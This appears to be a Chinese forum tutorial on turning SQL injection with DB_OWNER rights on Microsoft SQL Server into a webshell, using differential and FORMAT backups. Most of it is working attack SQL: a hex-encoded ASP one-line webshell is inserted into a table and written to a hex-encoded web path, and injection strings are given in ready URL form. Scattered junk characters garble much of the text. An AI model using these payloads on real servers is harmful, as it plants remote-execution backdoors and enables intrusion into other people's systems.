DB_OWNER权限得到webshell的改进办法

admin

DB_OWNER权限得到webshell的两点改进:

' o3 I' [" g1 A* y0 q减少备份文件大小，得到可执行的webshell成功率提高不少
+ W  E/ P0 o7 |9 a一利用差异备份
( c8 ?4 t) r+ z0 P$ W8 \加一个参数WITH DIFFERENTIAL
/ a! X; ~% i$ m+ }) v  B
1
2
3
4
8 v9 h- ^/ _$ ]! S) w declare @a sysname,@s nvarchar(4000) select @a=db_name(),@s=0x77006F006B0061006F002E00620061006B00 backup database @a to disk=@s
6 J$ p) w7 {9 }, S  \' Icreate table [dbo].[xiaolu] ([cmd] [image]);
insert into xiaolu(cmd) values(0x3C25657865637574652872657175657374282261222929253E)
" E( {+ j3 Q5 ]$ Edeclare @a sysname,@s nvarchar(4000) select @a=db_name(),@s=0x65003A005C007700650062005C0077006F006B0061006F002E00610073007000 backup database @a to disk=@s WITH DIFFERENTIAL

8 K' L& h& y/ s3 f, ]; q2 a0 R2 P* N二利用完全FORMAT
3 }3 i( d; @9 ?加一个参数WITH FROMAT
有些页面对数据库要执行几次，而备份又默认是每次都以追加的方式，如果一个注入点对数据库有几次操作，而备份的文件就 几倍的增加，所以

/ |0 |7 Z' _' [5 a: j3 z  M1
2
3
' D8 l2 F+ X4 D6 M4
! F( A. n6 o: f( U+ g declare @a sysname,@s nvarchar(4000) select @a=db_name(),@s=0x77006F006B0061006F002E00620061006B00 backup database @a to disk=@s
  d/ B" Z. Q3 L$ E& D3 [create table [dbo].[xiaolu] ([cmd] [image]);
' l& ]4 T* N$ X  ~insert into xiaolu(cmd) values(0x3C25657865637574652872657175657374282261222929253E)
declare @a sysname,@s nvarchar(4000) select @a=db_name(),@s=0x65003A005C007700650062005C0077006F006B0061006F002E00610073007000 backup database @a to disk=@s WITH FORMAT

总的来说就是那么简单几句,下面以备份数据库model为例子
- D- r% `2 j0 d! ?  W. ^* S1

7 L. [; I' C4 ?8 M7 n* U1
0 I+ b- b: e: @3 \& [ id=1;use model create table cmd(str image);insert into cmd(str) values ('<%25execute(request("a"))%25>')

9 Y4 V' _) h, s& u9 z2
' \& Q6 D( F7 X& s& m# e2 f# w
1
id=1;backup database model to disk='你的路径‘ with differential,format;--
3 ]# w) w, V9 C